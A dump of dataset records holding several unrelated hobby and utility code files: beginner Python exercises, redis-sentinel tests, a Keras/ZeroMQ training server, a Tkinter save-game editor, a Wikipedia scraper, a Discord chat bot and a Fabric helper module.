signal)\n\t\t\t\tdata, _ = server.recvfrom(1024)\n\t\t\t\tif data == b\"!\": break # Signal from the other thread (or another process) to shut down\n\t\t\t\tstatus[0] = True\n\t\t\t\tprint(\"Got trigger\")\n\t\t\tbreak\n\t\texcept OSError as e:\n\t\t\tif e.errno == 98: continue # Address already in use - try reconnecting\n\t\t\telse: raise\n\t\tfinally:\n\t\t\tserver.close()\n\t\t\ttry: os.unlink(TRIGGER_SOCKET)\n\t\t\texcept FileNotFoundError: pass\nelse:\n\tdesc = \" \".join(arg for arg in sys.argv[1:] if not arg.startswith(\"-\"))\n\ttake_notes(desc=desc, new_match=\"--new-block\" in sys.argv)\n","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"177244923","text":"gols = []\ntime = []\ntotG = 0\ncod = 0\nwhile True:\n    jogador = {'cod': cod}\n    cod += 1\n    jogador['nome'] = str(input('Player name: '))\n    totP = int(input(f'How many matches did {jogador[\"nome\"]} play? '))\n    for c in range(0, totP):\n        quantG = int(input(f'How many goals in match {c+1}? '))\n        gols.append(quantG)\n        totG += quantG\n    jogador['gols'] = gols.copy()\n    jogador['total'] = totG\n    time.append(jogador.copy())\n    jogador.clear()\n    gols.clear()\n    totG = 0\n    resp = input('Continue? [Y/N] ').upper()\n    if resp == 'N':\n        break\n    print('-' * 10)\n\nprint('=-'*50)\nprint('{:<5}{:<10}{:<15}{:<5}'.format('COD', ' NAME', ' GOALS', ' TOTAL'))\nprint('-'*40)\nfor j in time:\n    s = str(j['gols'])\n    print('{:<5} {:<10} {:<15} {:<5}'.format(j['cod'], j['nome'], s, j['total']))\n\nprint('=-'*40)\nresp = int(input('Show data for which player? [enter the player id] [999 stops] '))\nwhile True:\n    if resp == 999:\n        break\n    if resp >= len(time):\n        print('Player does not exist!')\n        resp = int(input('Show data for which player? [enter the player id] [999 stops] '))\n    else:\n        print('report for player {}'.format(time[resp]['nome']))\n        for i, g in enumerate(time[resp]['gols']):\n            print(f'in match {i+1} scored {g} goals')\n        print('=-' * 40)\n        resp = int(input('Show data for which player? 
[enter the player id] [999 stops] '))\n","sub_path":"CursoemVideo/desafio95aula19f.py","file_name":"desafio95aula19f.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"34572494","text":"def main():\n\tinstancias = int(input())\n\twhile instancias:\n\t\tnumConj = int(input())\n\t\tsetslist = []\n\n\t\tfor i in range(numConj):\n\t\t\tauxlist = []\n\t\t\tline = input()\n\t\t\tline = line.split(\" \")\n\t\t\t\n\t\t\tfor c in line:\n\t\t\t\tauxlist.append(int(c))\n\t\t\tdel auxlist[0]\n\n\t\t\tauxset = set(auxlist)\n\t\t\tsetslist.append(auxset)\n\n\t\tnumOps = int(input())\n\t\tans = []\n\t\tfor i in range(numOps):\n\t\t\tline = input()\n\t\t\tline = line.split(\" \")\n\t\t\ta = int(line[1]) - 1\n\t\t\tb = int(line[2]) - 1\n\t\t\tcount = 0\n\n\t\t\tif int(line[0]) == 1:\n\t\t\t\t#intersection\n\t\t\t\tcount = len( set.intersection( setslist[a], setslist[b] ) )\n\t\t\t\tprint(count)\n\t\t\t\tans.append(count)\n\t\t\telse:\n\t\t\t\t# union \n\t\t\t\tcount = len( set.union( setslist[a], setslist[b] ))\n\t\t\t\tprint(count)\n\t\t\t\tans.append(count)\n\n\t\tinstancias -= 1\n\n\nmain()","sub_path":"minitest1/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399973652","text":"import unittest\n\nimport mock\nimport redis.sentinel\n\nfrom limits.storage import RedisSentinelStorage, storage_from_string\nfrom tests.storage.test_redis import SharedRedisTests\n\n\nclass RedisSentinelStorageTests(SharedRedisTests, unittest.TestCase):\n    def setUp(self):\n        self.storage_url = 'redis+sentinel://localhost:26379'\n        self.service_name = 'localhost-redis-sentinel'\n        self.storage = RedisSentinelStorage(\n            self.storage_url,\n            service_name=self.service_name\n        )\n        redis.sentinel.Sentinel([\n            (\"localhost\", 26379)\n        ]).master_for(self.service_name).flushall()\n\n    def test_init_options(self):\n        with mock.patch(\n            \"limits.storage.redis_sentinel.get_dependency\"\n        ) as get_dependency:\n            storage_from_string(\n                self.storage_url + '/' + self.service_name,\n                connection_timeout=1\n            )\n            self.assertEqual(\n                get_dependency().Sentinel.call_args[1]['connection_timeout'], 1\n            )","sub_path":"tests/storage/test_redis_sentinel.py","file_name":"test_redis_sentinel.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"111406331","text":"#\n# Server in Python\n# Binds REP socket to tcp://*:3001\n# Expects input from client to reply with something\n#\n\nimport time\nimport zmq\nimport numpy as np\nimport pandas as pd\nimport math\nimport os\nimport sys\nimport json\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# Keras stuff\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import optimizers\nfrom keras import callbacks\nimport keras.backend as K\n\n# Sklearn stuff\nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\n\ndef processParams(params):\n\tallParams = params.split(\"&\")\n\t\n\tloss = ''\n\toptimizer = ''\n\tlearningRate = 0\n\tepochs = 0\n\tbatchSize = 0\n\ttestSize = 0\n\tlayers = []\n\t\n\tfor param in allParams:\n\t\tif \"loss\" in param:\n\t\t\tloss = param.split(\"=\")[1]\n\t\telif \"optimizer\" in param:\n\t\t\toptimizer 
= param.split(\"=\")[1]\n\t\telif \"learningRate\" in param:\n\t\t\tlearningRate = param.split(\"=\")[1]\n\t\telif \"epochs\" in param:\n\t\t\tepochs = param.split(\"=\")[1]\n\t\telif \"batchSize\" in param:\n\t\t\tbatchSize = param.split(\"=\")[1]\n\t\telif \"testSize\" in param:\n\t\t\ttestSize = param.split(\"=\")[1]\n\t\telif \"layers\" in param:\n\t\t\ttmp = param[param.index('=')+1:]\n\t\t\ttmp = tmp.replace('[', '')\n\t\t\ttmp = tmp.replace(']', '')\n\n\t\t\ttmpLayers = tmp.split(';')\n\n\t\t\tfor tmpLayer in tmpLayers:\n\t\t\t\ttmpValues = tmpLayer.split(',')\n\t\t\t\t\n\t\t\t\ttoAdd = []\n\t\t\t\tfor tmpValue in tmpValues:\n\t\t\t\t\ttoAdd.append(tmpValue.split(\"=\")[1])\n\n\t\t\t\tlayers.append(toAdd)\n\t\n\treturn {'loss':loss, 'optimizer':optimizer, 'learningRate':learningRate, 'epochs':epochs, 'batchSize':batchSize, 'testSize':testSize, 'layers':layers}\n\ndef buildModel(params, inputShape, outputShape):\n\t# Adjusting format of inputShape\n\tinputShape = (inputShape,)\n\tmodel = Sequential()\n\t\n\tfor layer in params['layers']:\n\t\tneurons = int(layer[1])\n\t\tactivationFunc = layer[2]\n\t\t\n\t\t# layer entries are parsed as strings, so cast the flag before comparing\n\t\tif int(layer[0]) == 1:\n\t\t\tmodel.add(Dense(neurons, input_shape=inputShape, activation=activationFunc, kernel_initializer='lecun_uniform'))\n\t\telse:\n\t\t\tmodel.add(Dense(neurons, activation=activationFunc, kernel_initializer='lecun_uniform'))\n\t\n\tmodel.add(Dense(outputShape, kernel_initializer='lecun_uniform'))\n\tmodel.compile(optimizer=getOptimizer(params), loss=params['loss'])\n\n\treturn model\n\ndef getOptimizer(params):\n\topt = None\n\toptName = params['optimizer'].lower()\n\tlearningRate = float(params['learningRate'])\n\t\n\tif optName == 'sgd':\n\t\topt = optimizers.SGD(lr=learningRate)\n\telif optName == 'rmsprop':\n\t\topt = optimizers.RMSprop(lr=learningRate)\n\telif optName == 'adagrad':\n\t\topt = optimizers.Adagrad(lr=learningRate)\n\telif optName == 'adadelta':\n\t\topt = optimizers.Adadelta(lr=learningRate)\n\telif optName == 'adam':\n\t\topt = optimizers.Adam(lr=learningRate)\n\telif optName == 'adamax':\n\t\topt = optimizers.Adamax(lr=learningRate)\n\telif optName == 'nadam':\n\t\topt = optimizers.Nadam(lr=learningRate)\n\t\t\n\treturn opt\n\ndef organizeData(testSize, sc, sc2):\n\t\n\t# Get the dataset and prepare it for analysis and model\n\tdf = pd.read_csv('suncor_full.csv')\n\tdataset=df.values[:,:]\n\tfeatures=dataset.shape[1]\n\t# Create training and testing data\n\tX = df.iloc[:, 1:features-1].values\n\ty = df.iloc[:, features-1].values\n\n\tsplit=int(X.shape[0]*(1-testSize))\n\tprint(split)\n\n\tX_train=X[:split,:]\n\tX_test=X[split:,:]\n\ty_train=y[:split]\n\ty_test=y[split:]\n\n\t#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=testSize, random_state=0)\n\n\t# Normalize the dataset with sc and sc2 (MinMaxScalers)\n\n\tX_train = sc.fit_transform(X_train)\n\tX_test = sc.transform(X_test)\n\n\ty_train = np.reshape(y_train, (y_train.shape[0], 1))\n\ty_test = np.reshape(y_test, (y_test.shape[0], 1))\n\n\ty_train = sc2.fit_transform(y_train)\n\ty_test = sc2.transform(y_test)\n\n\t#print('Train size: (%d x %d)'%(X_train.shape[0], X_train.shape[1]))\n\t#print('Test size: (%d x %d)'%(X_test.shape[0], X_test.shape[1]))\n\t\n\treturn X_train, X_test, y_train, y_test\n\ndef trainModel(params):\n\t# Organize data\n\ttestSize = float(params['testSize'])\n\t\n\t# Normalize the dataset\n\tsc = MinMaxScaler()\n\tsc2 = MinMaxScaler()\n\t#sc2 = StandardScaler()\n\t\n\tX_train, X_test, y_train, y_test = organizeData(testSize, sc, 
sc2)\n\t\n\t\"\"\"\n\t# Using clear_session() may result in unexpected behaviors.\n\t# For instance, after building and training the 6th model the program would just crash without throwing an exception.\n\tK.clear_session()\n\t\"\"\"\n\t\n\t# Build model\n\tmodel = buildModel(params, X_train.shape[1], y_train.shape[1])\n\t\n\t# Train model\n\t# Fitting the ANN to the training set\n\tbatchSize = int(params['batchSize'])\n\tepochsNum = int(params['epochs'])\n\t\n\tmodel.fit(X_train, y_train, batch_size=batchSize, epochs=epochsNum, verbose=0)\n\t\n\t\"\"\"\n\t#keras.callbacks.LambdaCallback(on_epoch_begin=None, on_epoch_end=None, on_batch_begin=None, on_batch_end=None, on_train_begin=None, on_train_end=None)\n\t#https://keras.io/callbacks/\n\tclass Callback(callbacks.Callback):\n\t\tdef on_epoch_end(self, batch, logs={}):\n\t\t\tprint('There you go!')\n\t\t\t#self.stopped_epoch = epoch\n\t\t\t#self.model.stop_training = True\n\n\t# Defining a callback\n\tcallbackTest = Callback()\n\tmodel.fit(X_train, y_train, batch_size=batchSize, epochs=epochsNum, verbose=1, callbacks=[callbackTest])\n\t\"\"\"\n\t\n\t# Test model\n\ty_pred = model.predict(X_test)\n\n\ty_pred = sc2.inverse_transform(y_pred)\n\ty_test = sc2.inverse_transform(y_test)\n\n\t# Scalar test loss\n\t#score = model.evaluate(X_test, y_test, verbose=1)\n\t#print(score)\n\n\t#https://en.wikipedia.org/wiki/Coefficient_of_determination\n\trSquared = r2_score(y_test, y_pred)\n\trmse = math.sqrt(mean_squared_error(y_test, y_pred))\n\tprint('R-Squared: %f' % rSquared)\n\tprint('RMSE: %f' % rmse)\n\t\n\t# Converting from numpy arrays to list to allow json creation\n\treturn {'values':y_test.tolist(), 'predicted':y_pred.tolist(), 'r-squared':rSquared, 'rmse':rmse}\n\t\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:3001\")\n\nprint(\"Server awaiting requests on port 3001.\")\n\nwhile True:\n\ttry:\n\t\t# Wait for next request from client\n\t\tmessage = socket.recv()\n\t\t\n\t\tprint('> Received request. <')\n\t\t\n\t\tprocParams = processParams(message.decode('utf-8'))\n\t\tresults = trainModel(procParams)\n\t\t\n\t\t# Converting dictionary to json\n\t\tjsonResults = json.dumps(results)\n\t\t\n\t\t# Send reply back to client\n\t\tsocket.send_string(jsonResults)\n\t\t#socket.send(b\"Done\")\n\t\tprint('> Response sent! 
<')\n\texcept Exception as e:\n\t\t#e = sys.exc_info()[0]\n\t\tprint(e)\n\t\tsocket.send_string('Error!')\n\t\t\n\"\"\"\nmultiprocessing\n\nfrom multiprocessing import Process, Queue\n\ndef run_in_separate_process(method, args):\n    def queue_wrapper(q, params):\n        r = method(*params)\n        q.put(r)\n\n    q = Queue()\n    p = Process(target=queue_wrapper, args=(q, args))\n    p.start()\n    return_val = q.get()\n    p.join()\n    return return_val\n\n\"\"\"\n","sub_path":"script/tensorflow serv.py","file_name":"tensorflow serv.py","file_ext":"py","file_size_in_byte":6782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"630504835","text":"import k2uu as K2U\n\nclass SUnit (object):\n \n    def __init__(self, tasksets, tests):\n        self.tasksets = tasksets\n        self.tests = tests\n        self.threadpool = 0\n\n        for test in self.tests:\n            if not isinstance(test, Test):\n                raise ValueError (\"provided Test does not implement the Scheduling Test interface\")\n            else:\n                test.start ()\n\n\n    def test (self, modifier = None): \n        \n        if modifier == \"utilisation-bound\":\n            tasksets = generator.tasksets (100, 10, generator.implicit).compile ([\"uniform\", [0.1, 0.9], True],[\"unifast\", []])\n\n        for test in self.tests: \n            test.start ()\n            test.join ()\n","sub_path":"model/k2u/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"216934209","text":"import builtins\nfrom .Constants import *\nfrom tkinter import *\nfrom util.Costumes import *\n\ndef CloseCostumes():\n    winCost.destroy()\n    del builtins.winCost\n    \n#Create Window Costumes\ndef CreateWindowCostumes():\n    global save\n    if save.data is None:\n        labelMessage.config(fg='red', text='No save data.')\n        return\n    try:\n        builtins.winCost\n    except:\n        builtins.winCost = Toplevel()\n        winCost.protocol(\"WM_DELETE_WINDOW\", CloseCostumes)\n        winCost.geometry(\"550x600\")\n        winCost.resizable(width=True, height=True)\n        winCost.title(\"Ham-Ham Games Save Editor - Costumes\")\n        builtins.lstCostumes = []\n\n        frameButtonCost = Frame(winCost)\n        frameButtonCost.pack(side=BOTTOM, fill=X)\n        builtins.buttonChkAllCost = Button(frameButtonCost, text=\"Select All\", command=SelectAllCostumes, font=FONT)\n        buttonChkAllCost.pack(side=LEFT, fill=BOTH, expand=1)\n        builtins.buttonUnchkAllCost = Button(frameButtonCost, text=\"Deselect All\", command=DeselectAllCostumes, font=FONT)\n        buttonUnchkAllCost.pack(side=LEFT, fill=BOTH, expand=1)\n        builtins.buttonSaveCost = Button(frameButtonCost, text=\"Save Costumes\", command=SaveWindowCostumes, font=FONT)\n        buttonSaveCost.pack(side=RIGHT, fill=BOTH, expand=1)\n        \n        frameCost = Frame(winCost)\n        frameCost.pack(side=TOP, fill=BOTH, expand = 1)\n        for i in range(4):\n            frameCost.columnconfigure(i, weight=1)\n        for i in range(NB_COST//4+1):\n            frameCost.rowconfigure(i, weight=1)\n        \n        for i in range(NB_COST):\n            b = BooleanVar()\n            chk = Checkbutton(frameCost, text=(\"%02d - \"%(i+1))+costumes[i][1], font=FONT, bd=0, variable=b)\n            chk.grid(row=i//4, column=i%4, sticky=\"w\")\n            if HasCostume(save.data, i):\n                chk.select()\n            lstCostumes.append((chk, b))\n\ndef SelectAllCostumes():\n    for i in range(NB_COST):\n        lstCostumes[i][0].select()\n    \ndef DeselectAllCostumes():\n    for i in range(NB_COST):\n        lstCostumes[i][0].deselect()\n    \ndef SaveWindowCostumes():\n    global save\n    for i in range(NB_COST):\n        if lstCostumes[i][1].get():\n            save.data = GetCostume(save.data, i)\n        else:\n            save.data = DelCostume(save.data, 
i)\n","sub_path":"edit/Costumes.py","file_name":"Costumes.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"81936965","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom requests import get\nfrom bs4.element import Tag\n\n\nignore = {'Lisp Machines, Inc.', 'Symbolics', 'Texas Instruments', 'Xerox'}\n\nlevels = {}\nlevels['Apple Inc.'] = {3}\nlevels['On S/360, S/370, and successor mainframes'] = {3}\nlevels['On other hardware platforms'] = {3}\n\n\ndef before(tag1, tag2, startTag):\n\n    if len(tag1) == 0: return False;\n    if len(tag2) == 0: return True;\n\n    tempTag = startTag\n\n    while tempTag and tempTag.previous_sibling:\n        tempTag = tempTag.previous_sibling\n        if isinstance(tempTag, Tag):\n            if tag1 in tempTag.getText():\n                return True\n            elif tag2 in tempTag.getText():\n                return False\n\n    return True\n\n\ndef includeLI(tag):\n\n    for p in tag.parents:\n\n        # ignores tags in the page's table of contents, navigation header, and footer\n        if 'id' in p.attrs.keys() and ('toc' in p['id'] or 'mw-navigation' in p['id'] or 'footer' in p['id']):\n            return False;\n\n        # ignores links to external references and wikipedia categories\n        if 'class' in p.attrs.keys() and ('references' in p['class'] or 'reference' in p['class'] or 'catlinks' in p['class']):\n            return False;\n\n        # ignores navigation links \n        if 'role' in p.attrs.keys() and 'navigation' in p['role']:\n            return False;\n\n    # ignores the 'See also' links\n    if tag.parent and tag.parent.find_previous_sibling('h2') and 'See also' in tag.parent.find_previous_sibling('h2').text:\n        return False;\n\n    # ignores the external links\n    if tag.parent and tag.parent.find_previous_sibling('h2') and 'External links' in tag.parent.find_previous_sibling('h2').text:\n        return False;\n\n    return True;\n\n\ndef includeA(tag):\n\n    # ignores tags specified directly in the ignore list\n    if tag.text in ignore:\n        return False;\n\n    # ignores links to external references and wikipedia categories\n    p = tag.parent\n    if p and 'class' in p.attrs.keys() and 'reference' in p['class']:\n        return False;\n\n    # this page displays operating systems at various levels of specificity, from kernel down to \n    # particular distributions in some cases. the script allows the user to specify the correct \n    # level(s) of each list to pull using the 'levels' dictionary defined above. the code below\n    # ensures that the tag is at an acceptable level. 
if the level is not specified, top-level\n    # items are pulled.\n\n    h4Depth = -1 # -1 because it takes one move to get out of the tag itself \n    h4Heading = ''\n    temp = tag\n    while temp and not temp.find_previous_sibling('h4'):\n        h4Depth += 1\n        temp = temp.parent\n\n    if temp and temp.find_previous_sibling('h4') and temp.find_previous_sibling('h4').select('span'):\n        h4Heading = temp.find_previous_sibling('h4').select('span')[0].getText()\n\n    h3Depth = -1 \n    h3Heading = '' \n    temp = tag\n    while temp and not temp.find_previous_sibling('h3'):\n        h3Depth += 1\n        temp = temp.parent\n\n    if temp and temp.find_previous_sibling('h3') and temp.find_previous_sibling('h3').select('span'):\n        h3Heading = temp.find_previous_sibling('h3').select('span')[0].getText()\n\n    if (h4Depth < h3Depth or before(h4Heading, h3Heading, temp)) and h4Heading in levels:\n        return h4Depth in levels[h4Heading]\n\n    elif h3Heading in levels:\n        return h3Depth in levels[h3Heading];\n\n    else:\n        return h3Depth == 1\n\n\nbaseUrl = 'https://en.wikipedia.org/wiki/List_of_operating_systems'\n\ndoc = get(baseUrl).text\nsoup = BeautifulSoup(doc, 'html.parser')\nlistItems = soup.select('li')\n\nanswers = set()\n\nfor i in listItems:\n\n    if not includeLI(i): continue\n\n    links = i.select('a')\n\n    if links and includeA(links[0]) and not links[0].getText() in answers:\n        answers.add(links[0].getText())\n\nfor answer in sorted(answers):\n    print(answer)\n\n","sub_path":"bin/kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"162537173","text":"\"\"\"\nSplitting genomic DNA\nIn the materials folder, there is a file called genomic_dna.txt\n Write a program that will split the genomic DNA into coding and non-coding parts, and write these sequences to two separate files\n\"\"\"\ndna=\"ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT\"\nexon1=dna[:63]\nexon2=dna[91:]\nintron=dna[63:91]\ndna_coding_per=(len(exon1)+len(exon2))/((len(exon1)+len(exon2))+len(intron))\ndna_coding=exon1+exon2\ndna_noncoding=intron\n#write the coding and non-coding sequences to two separate files, as the exercise asks\n#(output file names are a guess; the original wrote both sequences into out_genomic_dna.txt)\ncoding_file=open(\"out_coding_dna.txt\",\"w\")\ncoding_file.write(dna_coding)\ncoding_file.close()\nnoncoding_file=open(\"out_noncoding_dna.txt\",\"w\")\nnoncoding_file.write(dna_noncoding)\nnoncoding_file.close()\n","sub_path":"genomic_dna.py","file_name":"genomic_dna.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"115888550","text":"import random, config\r\nfrom modules import eightball\r\nbot = config.bot\r\nday = ['its been alright','pretty good','fantastic','pretty shit','meh','kill me pl0x','lovely just like you uWu']\r\nlove =['ewww','uWu I wuv u too','Silly human as if I could love a lower simple minded life form dont make me laugh']\r\neightball = ['uh nah', 'sure whatev', 'idklol', 'hell yea', 'no fuck that',];\r\n@bot.listen()\r\nasync def on_message(message):#text interactions based on user input but not using command prefix \r\n    if message.author == bot.user:\r\n        return\r\n    if (message.content.startswith('redbot, ') or message.content.startswith('redbot ')) and ' or ' in message.content.lower():#a or b? 
\r\n        print('%s requesting %s' % (message.author.name, 'yes or no'))\r\n        decisions = message.content.lower().replace('redbot', ''); decisions = decisions.replace(',', ''); decisions = decisions.split(' or ')\r\n        choice = random.choice(decisions)\r\n        await bot.send_message(message.channel, '%s, %s' % (message.author.name, random.choice(decisions)))\r\n        return\r\n    if message.content.startswith('!8ball'):\r\n        await bot.send_message(message.channel, random.choice(eightball))\r\n        print('%s requesting %s' % (message.author.name, '8ball'))\r\n        return\r\n    if any(x in message.content.lower() for x in ('how has','how was')) and any(y in message.content.lower() for y in ('your', 'ur')) and 'redbot' in message.content.lower():\r\n        await bot.send_message(message.channel, random.choice(day)+' how has yours been? {0.author.mention}'.format(message))\r\n        print('%s requesting %s' % (message.author.name, 'day'))\r\n        response = await bot.wait_for_message(author=message.author, timeout=60)\r\n        if response.content.startswith('great'):\r\n            await bot.send_message(message.channel, 'glad to hear it <3')\r\n            return\r\n        if response.content.startswith('bad'):\r\n            await bot.send_message(message.channel, 'sorry to hear that (´・ω・`)')\r\n            return\r\n    \r\n    if any(x in message.content.lower() for x in (' love ', ' wuv')) and 'redbot' in message.content.lower():\r\n        if message.author.id == ('453783112070201346'):\r\n            await bot.send_message(message.channel, 'sorry I only like 2d grills uWu')\r\n            return\r\n        await bot.send_message(message.channel, random.choice(love))\r\n        print('%s requesting %s' % (message.author.name, 'love'))\r\n        return\r\n    if any(x in message.content.lower() for x in ('hello', 'hi')) and 'redbot' in message.content.lower():\r\n        if message.author.id == ('113421096488878080'):\r\n            msg = 'Hello Master'.format(message)\r\n            await bot.send_message(message.channel, msg)\r\n            return\r\n        else:\r\n            msg = 'Hello {0.author.mention}'.format(message)\r\n            await bot.send_message(message.channel, msg)\r\n            return\r\n    if any(x in message.content.lower() for x in ('fuck', 'fk', 'fuk')) and any(y in message.content.lower() for y in ('you', 'u')) and 'redbot' in message.content.lower():\r\n        print('%s requesting %s' % (message.author.name, 'flip the bird'))\r\n        await bot.send_message(message.channel, ' No U https://tenor.com/view/fake-flip-off-middle-finger-bye-wave-gif-5337173')\r\n        return\r\n    if any(x in message.content.lower() for x in ('night', 'goodnight')) and 'redbot' in message.content.lower():\r\n        print('%s requesting %s' % (message.author.name, 'goodnight'))\r\n        await bot.send_message(message.channel, 'Goodnight %s (*^▽^)/' % message.author.name)\r\n    elif any(x in message.content.lower() for x in ('morning', 'good morning')) and 'redbot' in message.content.lower():\r\n        print('%s requesting %s' % (message.author.name, 'morning redbot'))\r\n        await bot.send_message(message.channel, 'Good morning %s ( ^ω^)' % message.author.name)\r\n    elif any(x in message.content.lower() for x in ('pls', 'plis', 'please')) and 'redbot' in message.content.lower():\r\n        print('%s requesting %s' % (message.author.name, 'nope'))\r\n        await bot.send_message(message.channel, 'nope')\r\n    
\r\n","sub_path":"modules/On_message.py","file_name":"On_message.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"406872005","text":"# -*- coding: utf8 -*-\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport re\nimport ast\nimport string\nimport random\nimport logging\nimport platform\nimport functools\ntry:\n    import cPickle as pickle\nexcept:\n    import pickle\n\ntry:\n    # The fast Python 2.7.x module\n    import cStringIO as StringIO\nexcept:\n    try:\n        # Python 2.x fallback (module import, so StringIO.StringIO() keeps working)\n        import StringIO\n    except ImportError:\n        # Python 3.x (aliased module, for the same reason)\n        import io as StringIO\n\nfrom ..foundations.classes import SimpleObject\n\nfrom . import nofabric\n# Cannot import \"utils\" here, circular loop.\n\ntry:\n    from fabric.api import env, execute, task\n    from fabric.api import run as fabric_run\n    from fabric.api import sudo as fabric_sudo\n    from fabric.api import local as fabric_local\n    from fabric.operations import get, put\n    from fabric.context_managers import prefix, cd, lcd, hide\n    from fabric.colors import cyan\n\n    # imported from utils\n    from fabric.contrib.files import exists # NOQA\n\n    # used in sparks submodules, not directly here. Thus the # NOQA.\n    from fabric.api import task # NOQA\n    from fabric.context_managers import cd # NOQA\n    from fabric.colors import green # NOQA\n\n    # if not env.all_hosts:\n    #     env.host_string = 'localhost'\n\n    _wrap_fabric = False\n\n    #\n    # NOTE: we re-wrap fabric functions into ours, which test against localhost.\n    # This allows multiprocessing to run correctly on localhost, via real\n    # local commands.\n    # Else, paramiko will fail with obscure errors (observed in the `pkgmgr`),\n    # and it's horribly terrible to debug (trust me).\n    # Hoping nobody will try to multiprocessing.Process(fabric) via sparks\n    # (or not). This only seems to work when fabric does the @parallel jobs,\n    # not when trying to run fabric tasks in multiprocessing.* encapsulation.\n    #\n\n    def run(*args, **kwargs):\n        if is_localhost(env.host_string):\n            return nofabric.run(*args, **kwargs)\n\n        else:\n            return fabric_run(*args, **kwargs)\n\n    def local(*args, **kwargs):\n        if is_localhost(env.host_string):\n            return nofabric.local(*args, **kwargs)\n\n        else:\n            return fabric_local(*args, **kwargs)\n\n    def sudo(*args, **kwargs):\n        if is_localhost(env.host_string):\n            return nofabric.sudo(*args, **kwargs)\n\n        else:\n            return fabric_sudo(*args, **kwargs)\n\nexcept ImportError:\n    # If fabric is not available, this means we are imported from 1nstall.py,\n    # or more generally fabric is not installed.\n    # Everything will fail except the base system detection. 
We define the bare\n # minimum for it to work on a local Linux/OSX system.\n\n run = nofabric.run # NOQA\n local = nofabric.local # NOQA\n sudo = nofabric.sudo # NOQA\n exists = nofabric.exists # NOQA\n\n\n# Global way to turn all of this module silent.\nDEBUG = bool(os.environ.get('SPARKS_DEBUG', False))\nQUIET = not DEBUG and not bool(os.environ.get('SPARKS_VERBOSE', True))\nLOGGER = logging.getLogger(__name__)\nremote_configuration = None\nlocal_configuration = None\n\nall_roles = [\n 'web', 'proxy',\n 'db', 'memcache', 'mysql',\n 'pg', 'mongodb', 'redis',\n 'load', 'ha', 'loadbalancer',\n 'monitoring', 'stats',\n 'lang', 'admin',\n 'beat', 'flower', 'shell',\n]\n\nworker_information = {}\n\nfor worker_type, worker_name in (\n ('worker', 'Generic'),\n ('worker_io', 'I/O dedicated'),\n ('worker_net', 'Network'),\n ('worker_solo', 'Mono-process'),\n ('worker_duo', 'Dual-process'),\n ('worker_trio', 'Tri-process'),\n ('worker_default', 'Default'),\n ('worker_mongo', 'Mongo worker'),\n ('worker_network', 'Network'),\n ('worker_net', 'Network-related'),\n ('worker_sync', 'Synchronization'),\n ('worker_articles', 'Articles'),\n ('worker_longtasks', 'Long tasks'),\n ('worker_permanent', 'Permanent tasks'),\n ('worker_swarm', 'Swarm-processing'),\n ('worker_check', 'Checker'),\n ('worker_create', 'Create'),\n ('worker_refresh', 'Refresher'),\n ('worker_fetch', 'Fetcher'),\n ('worker_index', 'Indexer'),\n ('worker_crawl', 'Crawler'),\n ('worker_archive', 'Archive'),\n ('worker_clean', 'Cleaner'),\n ('worker_backup', 'Backup'),\n ('worker_background', 'Background'),\n ('worker_client', 'Client'),\n ('worker_server', 'Server'),\n ('worker_social', 'Social'),\n ('worker_partners', 'Partner'),\n ('worker_users', 'User processes'),\n ('worker_system', 'System'),\n ('worker_cluster', 'Cluster')):\n for sub_name, priority in (\n (worker_type, ''),\n (worker_type + '_low', 'Low-priority '),\n (worker_type + '_medium', 'Medium-priority '),\n (worker_type + '_high', 'High-priority ')):\n all_roles.append(sub_name)\n\n worker_information.update({\n sub_name: (priority + worker_name + ' worker',\n sub_name[7:] or 'celery')\n })\n\nworker_roles = [r for r in all_roles if r.startswith('worker')]\n\n\n# ===================================================== Fabric helper functions\n\n\ndef custom_roles():\n \"\"\" Return custom roles defined in the fabfile, in `worker_information`. \"\"\"\n\n custom_roles = [\n role for role in getattr(\n env, 'sparks_options', {}).get(\n 'worker_information', {}).keys() if role.startswith('worker')\n ]\n\n LOGGER.debug(u'Custom roles picked: %s', u', '.join(custom_roles))\n\n return custom_roles\n\n\ndef non_empty_roles(roles):\n \"\"\" Keep only non-empty roles. \"\"\"\n\n non_empty = []\n\n # LOGGER.debug(u'__all__ is: %s', env.roledefs.get('__all__'))\n # LOGGER.debug(u'roles is: %s', roles)\n\n for role in roles:\n if env.roledefs.get(role, []) != []:\n non_empty.append(role)\n\n # else:\n # LOGGER.debug(u'Role %s has no host, removing.', role)\n\n return non_empty\n\n\ndef 